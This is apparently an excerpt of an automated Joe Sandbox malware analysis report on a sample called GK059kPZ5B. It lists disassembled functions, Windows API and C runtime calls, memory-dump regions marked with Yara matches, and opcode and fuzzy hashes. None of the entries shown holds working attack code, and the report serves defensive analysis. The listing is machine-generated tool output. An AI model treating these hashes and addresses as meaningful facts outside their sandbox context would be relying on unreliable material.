                                                            • Instruction Fuzzy Hash: 6B417B31A001026FDF34BFB88D46AAE7BA4EF09774F248675FA1CD62A2F734484047A1
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,00A8049A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 00A86B71
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A86BFA
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A86C0C
                                                            • __freea.LIBCMT ref: 00A86C15
                                                              • Part of subcall function 00A8392E: RtlAllocateHeap.NTDLL(00000000,00A5DAFC,00000000), ref: 00A83960
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: 3871a130c6b9b3006aa1f46d6ff278bf932d4d7330f30c68a16d81a1f714d6d8
                                                            • Instruction ID: ee1b11f7a741a3ed8b0e15d93353e43c7e697881482c5f0d37d3962aff10d9fa
                                                            • Opcode Fuzzy Hash: 3871a130c6b9b3006aa1f46d6ff278bf932d4d7330f30c68a16d81a1f714d6d8
                                                            • Instruction Fuzzy Hash: 4331AE72A0021AAFEF25AF64DC85EAE7BB5EB40714F144268FC59DB150E735CD90CBA0
                                                            APIs
                                                            • ShowWindow.USER32(00000005), ref: 00401FCB
                                                            • UpdateWindow.USER32 ref: 00401FD3
                                                            • ShowWindow.USER32(00000000), ref: 00401FE7
                                                            • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040204A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$MoveUpdate
                                                            • String ID:
                                                            • API String ID: 1339878773-0
                                                            • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                            • Instruction ID: 839b3a4605fc6fa716c5a1e9d0f595454ae31d99f498b0463e76923fa4e42aa6
                                                            • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                            • Instruction Fuzzy Hash: 83016531E006109BC7258F19ED48A267BAAFFD5712B14803AF40C972B1D7B1EC42CB9C
                                                            APIs
                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00429103
                                                              • Part of subcall function 00429050: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042907F
                                                              • Part of subcall function 00429050: ___AdjustPointer.LIBCMT ref: 0042909A
                                                            • _UnwindNestedFrames.LIBCMT ref: 00429118
                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429129
                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00429151
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                            • String ID:
                                                            • API String ID: 737400349-0
                                                            • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                            • Instruction ID: c9ce71b37bf0ada561c0f38da96873ff120a9bb937dab02468c91de1f254ac1d
                                                            • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                            • Instruction Fuzzy Hash: F0018032200159BBDF12AE92DC46EEB3B69EF49758F444009FE0856121C33AEC71DBA8
                                                            APIs
                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00A7936A
                                                              • Part of subcall function 00A792B7: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00A792E6
                                                              • Part of subcall function 00A792B7: ___AdjustPointer.LIBCMT ref: 00A79301
                                                            • _UnwindNestedFrames.LIBCMT ref: 00A7937F
                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00A79390
                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00A793B8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                            • String ID:
                                                            • API String ID: 737400349-0
                                                            • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                            • Instruction ID: a42a3e184c552ce00f430dc8c22513b25c9edca5093842fdf18833f6855a6c65
                                                            • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                            • Instruction Fuzzy Hash: E6010572100148BBDF126F958D41EEB3B69EF98754F04C019FE0C5A121D732E861EBA0
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue), ref: 00434F81
                                                            • GetLastError.KERNEL32(?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FCC), ref: 00434F8D
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F9B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                            • Instruction ID: 0cc1d3989d4ca165353a689bafe11803c7becb77e2de78a39e4b2d1452c45288
                                                            • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                            • Instruction Fuzzy Hash: 2601FC366052226BC7214F69AC449A7B7D8AF8AFA1F251631F905D3240D724ED01CAE8
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00A8515D,00000000,00000000,00000000,00000000,?,00A85415,00000006,0044A378), ref: 00A851E8
                                                            • GetLastError.KERNEL32(?,00A8515D,00000000,00000000,00000000,00000000,?,00A85415,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,00A82233), ref: 00A851F4
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A8515D,00000000,00000000,00000000,00000000,?,00A85415,00000006,0044A378,0044A370,0044A378,00000000), ref: 00A85202
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                            • Instruction ID: 464d7c8ef40f1b154eae3e4fb03b03a96279052b72c8a0b4c09df81ff4e43da0
                                                            • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                            • Instruction Fuzzy Hash: 9E01D03AE516226BC7216F79AC44A97BBA8FF46F61B210630FD05D7141EB20DD01CBE4
                                                            APIs
                                                            • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426168
                                                            • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042617C
                                                            • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426194
                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004261AC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                            • String ID:
                                                            • API String ID: 78362717-0
                                                            • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                            • Instruction ID: b0d532a26f63f6046bced7af3b1e02d5ba17ec3ebf316f442b0a79b2244c41dd
                                                            • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                            • Instruction Fuzzy Hash: 3F01F232700120ABCF16AE569811AFF779AAF90354F41001BFC11A7282CA34FD2192A8
                                                            APIs
                                                            • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00A763CF
                                                            • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00A763E3
                                                            • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00A763FB
                                                            • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A76413
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                            • String ID:
                                                            • API String ID: 78362717-0
                                                            • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                            • Instruction ID: c7a65a07c125b6b223b09ab22836c3889893043d6064aaf1adcfd28626daa795
                                                            • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                            • Instruction Fuzzy Hash: 6E01D632600924ABCF16AF94CE41BEF77ADEF94750F00C055FD19AB282DA70ED0196E0
                                                            APIs
                                                            • Concurrency::location::_Assign.LIBCMT ref: 00A72BD1
                                                            • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00A72BEF
                                                              • Part of subcall function 00A686A7: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 00A686C8
                                                              • Part of subcall function 00A686A7: Hash.LIBCMT ref: 00A68708
                                                            • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00A72BF8
                                                            • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00A72C18
                                                              • Part of subcall function 00A6F6FF: Hash.LIBCMT ref: 00A6F711
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                            • String ID:
                                                            • API String ID: 2250070497-0
                                                            • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                            • Instruction ID: 7d13cb182de9dd532b2affb5017abd5aa671deb966c29e0720d16dec4bf5549c
                                                            • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                            • Instruction Fuzzy Hash: 71118E76400600AFC715DF64C981ACAF7F8FF19310F008A1EE55A87252DB70F904CB50
                                                            APIs
                                                            • Concurrency::location::_Assign.LIBCMT ref: 00A72BD1
                                                            • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00A72BEF
                                                              • Part of subcall function 00A686A7: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 00A686C8
                                                              • Part of subcall function 00A686A7: Hash.LIBCMT ref: 00A68708
                                                            • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00A72BF8
                                                            • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00A72C18
                                                              • Part of subcall function 00A6F6FF: Hash.LIBCMT ref: 00A6F711
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                            • String ID:
                                                            • API String ID: 2250070497-0
                                                            • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                            • Instruction ID: 3180dc8ef030f8066b633fba1b741bdae7558639f0499b7962b3a6fe9d623086
                                                            • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                            • Instruction Fuzzy Hash: 28016976400604ABC715DFA5C982EDAF7F8FF58310F108A2EE55A87251DB70F904CB60
                                                            APIs
                                                            • __EH_prolog3_GS.LIBCMT ref: 0040594B
                                                              • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405996
                                                            • __Getcoll.LIBCPMT ref: 004059A5
                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 004059B5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                            • String ID:
                                                            • API String ID: 1836011271-0
                                                            • Opcode ID: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                            • Instruction ID: 9fd44fd2a3ed9f30d206a08b807669c32d498cc680062da3e3aec36702d876a7
                                                            • Opcode Fuzzy Hash: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                            • Instruction Fuzzy Hash: 710135B1920209DFDB10EFA5C48279DBBB0FF00314F00813EE445AB281DB789984CF99
                                                            APIs
                                                            • __EH_prolog3_GS.LIBCMT ref: 00404E8F
                                                              • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EDA
                                                            • __Getcoll.LIBCPMT ref: 00404EE9
                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404EF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                            • String ID:
                                                            • API String ID: 1836011271-0
                                                            • Opcode ID: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                            • Instruction ID: 32d9f0e851cf819fcbf451bbe4f834ae4b9dc531d1d0ebefa622e2c81c742f75
                                                            • Opcode Fuzzy Hash: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                            • Instruction Fuzzy Hash: 9F015771910209DFEB10EFA5C48179DB7B0BF80314F00813EE445AB281DB789984CB99
                                                            APIs
                                                            • __EH_prolog3_GS.LIBCMT ref: 00A550F6
                                                              • Part of subcall function 00A5BDD3: __EH_prolog3_GS.LIBCMT ref: 00A5BDDA
                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00A55141
                                                            • __Getcoll.LIBCPMT ref: 00A55150
                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00A55160
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                            • String ID:
                                                            • API String ID: 1836011271-0
                                                            • Opcode ID: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                            • Instruction ID: 69c01fe7d8e2c01a304abae2730078833d4c2947d7d5c4d673f2d9d078e588a3
                                                            • Opcode Fuzzy Hash: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                            • Instruction Fuzzy Hash: 1E015E71D10708DFDB04EFA4C551BDEBBB0BF44362F108529E855AB242DBB89A88CB91
                                                            APIs
                                                            • __EH_prolog3_GS.LIBCMT ref: 00A55BB2
                                                              • Part of subcall function 00A5BDD3: __EH_prolog3_GS.LIBCMT ref: 00A5BDDA
                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00A55BFD
                                                            • __Getcoll.LIBCPMT ref: 00A55C0C
                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00A55C1C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                            • String ID:
                                                            • API String ID: 1836011271-0
                                                            • Opcode ID: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                            • Instruction ID: 1f1cfb2072103595cfadb6aa5e0bb833256cb150985d432eec1935249c2a0134
                                                            • Opcode Fuzzy Hash: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                            • Instruction Fuzzy Hash: 4D017171D10708DFDB04EFA4C651BDDBBB0FF04322F508429E845AB242DBB99988CB90
                                                            APIs
                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF39
                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF49
                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF5D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Compare_exchange_acquire_4std::_
                                                            • String ID:
                                                            • API String ID: 3973403980-0
                                                            • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                            • Instruction ID: 72732f5efe9b63b971529a3f0cd962c81f2cd17cb7f3a1b82d9d198b59e5c030
                                                            • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                            • Instruction Fuzzy Hash: FB01F63608414DBBCF129E64DC428EE3B26EB08354B148416FD18C4232C336CAB2AF8E
                                                            APIs
                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00A6C190
                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00A6C1A0
                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00A6C1B0
                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00A6C1C4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Compare_exchange_acquire_4std::_
                                                            • String ID:
                                                            • API String ID: 3973403980-0
                                                            • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                            • Instruction ID: fe18e884b356ab6fbd7a388d351c741e4aa89bf9a96e129bbca4db24fc950cc3
                                                            • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                            • Instruction Fuzzy Hash: 5A013C7B004109ABCF129F94DD068BD3B36FF06370F148512F99884072D732C670AB82
                                                            APIs
                                                            • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110FB
                                                              • Part of subcall function 0041096D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041098F
                                                              • Part of subcall function 0041096D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 004109B0
                                                            • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041110E
                                                            • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0041111A
                                                            • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411123
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                            • String ID:
                                                            • API String ID: 4284812201-0
                                                            • Opcode ID: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                            • Instruction ID: 32ef31896b2cb6abdcbb34161c10e74fd4bf83775755d0cce9f66a209d269357
                                                            • Opcode Fuzzy Hash: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                            • Instruction Fuzzy Hash: 5EF02470A8020467DF24BBA648525EE72954F84328F14003FB7126B7D2CEBC4DC2929C
                                                            APIs
                                                            • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413545
                                                              • Part of subcall function 004128CF: ___crtGetTimeFormatEx.LIBCMT ref: 004128E5
                                                              • Part of subcall function 004128CF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00412904
                                                            • GetLastError.KERNEL32 ref: 00413561
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413577
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00413585
                                                              • Part of subcall function 004126A5: SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                            • String ID:
                                                            • API String ID: 1674182817-0
                                                            • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                            • Instruction ID: d4d0e34155d1b65ea1fa919a817b0ae51ac78690af07c02d22dcd9fb344bc12c
                                                            • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                            • Instruction Fuzzy Hash: 80F0E2B1A002193AE720BA765D07FFB369C9B00B90F90081BB905E6082EDDCD95042BC
                                                            APIs
                                                            • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00A61362
                                                              • Part of subcall function 00A60BD4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00A60BF6
                                                              • Part of subcall function 00A60BD4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00A60C17
                                                            • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00A61375
                                                            • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00A61381
                                                            • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00A6138A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                            • String ID:
                                                            • API String ID: 4284812201-0
                                                            • Opcode ID: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                            • Instruction ID: a913a714bd766165e29504057cbf1f6d47d9ebe8291eb4947c3dc39b805daae7
                                                            • Opcode Fuzzy Hash: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                            • Instruction Fuzzy Hash: 6BF0E931644708679F54BBB409529BF36B65F50310F584179B5126F3C1DE744D4593D4
                                                            APIs
                                                            • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00A637AC
                                                              • Part of subcall function 00A62B36: ___crtGetTimeFormatEx.LIBCMT ref: 00A62B4C
                                                              • Part of subcall function 00A62B36: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00A62B6B
                                                            • GetLastError.KERNEL32 ref: 00A637C8
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A637DE
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A637EC
                                                              • Part of subcall function 00A6290C: SetThreadPriority.KERNEL32(?,?), ref: 00A62918
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                            • String ID:
                                                            • API String ID: 1674182817-0
                                                            • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                            • Instruction ID: b255409e9fdfd35d6b3ff1a3e5f114af788c8ad662cefb4721a0ee65a1e12486
                                                            • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                            • Instruction Fuzzy Hash: EDF0A7B2A4031939E720F7754D0BFBB36ACDB01751F50482AB915E60C2ED99D40086B9
                                                            APIs
                                                            • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 00A6D0A8
                                                            • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00A6D0CC
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A6D0DF
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A6D0ED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
